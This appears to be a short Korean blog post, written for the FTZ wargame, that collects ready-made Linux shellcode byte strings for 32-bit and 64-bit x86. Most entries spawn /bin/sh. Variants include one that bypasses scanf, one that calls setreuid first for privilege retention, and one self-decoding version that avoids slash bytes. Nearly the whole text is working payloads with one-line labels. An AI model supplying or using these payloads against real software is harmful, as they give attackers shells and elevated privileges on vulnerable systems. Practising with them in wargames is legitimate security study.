SHELL CODE

2022. 3. 10. 19:41기타/info

ftz를 풀면서 shellcode를 이용한 문제가 많아서 한번 정리해보면 좋을것 같다는 생각에 작성했습니다

 

32bit shellcode

 

6bytes shellcode

 \x31\xc0\xb0\x01\xcd\x80


25bytes shellcode [가장 base]

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


26 Bytes Shell Code [scanf 우회]

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80


41 Bytes Shell Code [setreuid(geteuid(), getreuid())]

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


48 Bytes Shell Code [\x2f가 없음]

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81


64bit shellcode

23 Bytes Shell Code [가장base]

\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05


31 Bytes Shell Code

\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05

 

참고 : https://hackhijack64.tistory.com/38

'기타 > info' 카테고리의 다른 글

opt-in & opt-out  (0) 2022.05.31
Base64 Encoding  (0) 2022.03.21
URL Encoding Table  (0) 2022.03.17
Comparing C to machine language  (0) 2022.03.12
ASCII Table  (0) 2022.03.06